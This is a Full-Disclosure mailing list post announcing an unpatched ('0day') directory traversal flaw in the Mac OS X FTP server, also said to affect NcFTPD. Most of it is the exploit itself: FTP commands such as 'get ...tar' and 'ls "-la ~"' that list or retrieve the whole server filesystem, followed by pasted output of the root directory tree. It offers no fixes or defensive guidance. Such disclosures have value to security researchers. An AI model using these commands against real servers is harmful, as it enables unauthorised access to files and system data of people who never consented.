MacOS X FTP Server 0day
it was my finding, who carez

ftp <target>
get ...tar
will retrieve all contents of underlying folder of user ftp. (hint:
works with correct user account in latest NcFTPD too)

ftp> ls ~ftp
200 PORT command successful.
150 Opening ASCII mode data connection for /us.
/.hotfiles.btree
/.rnd
/.Trashes
/.vol
/Applications
/automount
/bin
/cores
/Desktop DB
/Desktop DF
/dev
/Developer
/etc
/Groups
/Library
/mach
/mach.sym
/mach_kernel
/Network
/opt
/private
/sbin
/
/System
/tmp
226 Transfer complete.
ftp: 236 bytes received in 0,06Seconds 3,81Kbytes/sec.

ls ~ftp/etc/*/*

ftp> ls "-la ~"
227 Entering Passive Mode ()
150 Opening ASCII mode data connection for directory listing.
total 20011
drwxrwxr-t  34 0    80             1258 Dec 30 17:55 .
drwxrwxr-t  34 0    80             1258 Dec 30 17:55 ..
-rw-r--r--   1 0    80             6148 Jul 19  2004 .DS_Store
d-wx-wx-wt   2 0    80               68 Jul 19  2004 .Trashes
-rw-------   1 0    80           786432 Sep  5  2007 .hotfiles.btree
-rw-------   1 0    80             1024 Nov 30  2006 .rnd
dr-xr-xr-x   2 0    0               160 Dec 30 17:55 .vol
drwxrwxr-x  35 0    80             1190 May 11  2009 Applications
-rw-r--r--   1 0    80            29184 Dec 23  2006 Desktop DB
-rw-r--r--   1 0    80           194178 Dec 23  2006 Desktop DF
drwxrwxr-x   3 0    80              102 May 11  2009 Developer
-rwxr-xr-x   3 501  80             1024 Jun 25  2007 DiskWarrior.dmg
drwxrwxr-x   2 501  80               68 Jul 17  2010 Groups
drwxrwxr-t  53 0    80             1802 Nov 30  2006 Library
drwxr-xr-x   1 0    0               512 Feb 11 11:54 Network
drwxrwxr-x   6 501  80              204 Nov 30  2006 Shared Items
drwxr-xr-x   4 0    0               136 May 11  2009 System
drwxrwxr-t   6 0    80              204 Nov 30  2006 Users
drwxrwxrwt   6 0    80              204 Dec 30 17:55 Volumes
drwxr-xr-x   4 0    80              136 Jun  8  2005 automount
drwxr-xr-x  48 0    0              1632 May 11  2009 bin
drwxr-xr-x  43 0    501            1462 Jun 28  2006 bru
drwxrwxr-t   2 0    80               68 Dec  8  2003 cores
dr-xr-xr-x   2 0    0               512 Dec 30 17:55 dev
lrwxr-xr-x   1 0    4294967294       11 Nov 30  2006 etc -> private/etc
lrwxr-xr-x   1 0    80                9 Dec 30 17:55 mach -> ???
-r--r--r--   1 0    80           624040 Dec 30 17:55 mach.sym
-rw-r--r--   1 0    0           8570484 Oct 10  2007 mach_kernel
drwxr-xr-x   3 0    0               102 Nov  4  2005 opt
drwxr-xr-x   6 0    0               204 Dec 30 17:55 private
drwxr-xr-x  64 0    0              2176 May 11  2009 sbin
lrwxr-xr-x   1 0    4294967294       11 Nov 30  2006 tmp -> private/tmp
drwxr-xr-x  10 0    0               340 May 11  2009 usr
lrwxr-xr-x   1 0    4294967294       11 Nov 30  2006 var -> private/var
226 Transfer complete.
ftp> ls "-la ~"

ls "-laR ~" YOU NAME IT! WHOLE DIRTREE OF SERVER

/Kingcope

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/